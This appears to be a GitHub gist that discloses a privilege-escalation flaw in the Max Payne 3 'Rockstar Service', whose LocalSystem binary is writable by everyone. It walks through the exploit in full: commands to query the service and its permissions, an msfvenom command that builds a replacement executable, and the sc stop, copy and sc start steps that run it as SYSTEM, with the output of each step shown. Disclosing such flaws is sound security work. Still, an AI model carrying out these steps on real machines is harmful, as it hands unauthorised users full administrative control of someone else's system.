Skip to content

Instantly share code, notes, and snippets.

@ripp3rdoc

ripp3rdoc/MaxPayne3 - EOP.md

Last active April 2, 2024 15:49
Show Gist options
  • Save ripp3rdoc/07bf6cc57f7b1ecf99f1c1f110ee03fc to your computer and use it in GitHub Desktop.
Save ripp3rdoc/07bf6cc57f7b1ecf99f1c1f110ee03fc to your computer and use it in GitHub Desktop.
Download ZIP
Raw
MaxPayne3 - EOP.md

Max Payne 3 is vulnerable to Insecure File Permissions. Allowing low-privilege user to overwrite the service binary to execute code as Administrator (NT Authority\SYSTEM).

Querying 'Rockstar Service'; we can see that the service path is as follows: "E:\XBox Games\MP3\RockstarService.exe"

C:\Program Files\Sysinternals>sc qc "Rockstar Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Rockstar Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "E:\XBox Games\MP3\RockstarService.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Rockstar Game Library Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

By checking the file permissions, we can see that the RockstarService.exe is world-readable/writable.

C:\Program Files\Sysinternals>accesschk.exe -accepteula "E:\XBox Games\MP3\RockstarService.exe"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

E:\XBox Games\MP3\RockstarService.exe
  RW Everyone
  RW NT AUTHORITY\SYSTEM
  RW BUILTIN\Administrators

We can easily exploit this vulnerability by creating a malicious binary with MSFVenom, and replacing RockstarService.exe with it with the same name.

┌──(Ripp3rdoc㉿hydra)-[~]
└─$ msfvenom -f exe -p windows/x64/exec CMD='C:\Windows\System32\cmd.exe'  -o RockstarService.exe
No encoder specified, outputting raw payload
Payload size: 295 bytes
Final size of exe file: 6656 bytes
Saved as: RockstarService.exe

Stop the service and overwrite the service file with your own.

C:\Program Files\Sysinternals>sc stop "Rockstar Service"

SERVICE_NAME: Rockstar Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
C:\Users\Ripp3rdoc\Downloads>copy "C:\Users\Ripp3rdoc\Downloads\RockstarService.exe" "E:\XBox Games\MP3\RockstarService.exe"
Overwrite E:\XBox Games\MP3\RockstarService.exe? (Yes/No/All): yes
        1 file(s) copied.

And finally, by either starting the game or running "Launcher.exe"; you'll gain admin privileges.

C:\Program Files\Sysinternals>sc start "Rockstar Service"

SERVICE_NAME: Rockstar Service
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 4  RUNNING
                                (STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0
        PID                : 11540
        FLAGS              :

App/Game link: https://store.steampowered.com/app/204100/Max_Payne_3/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment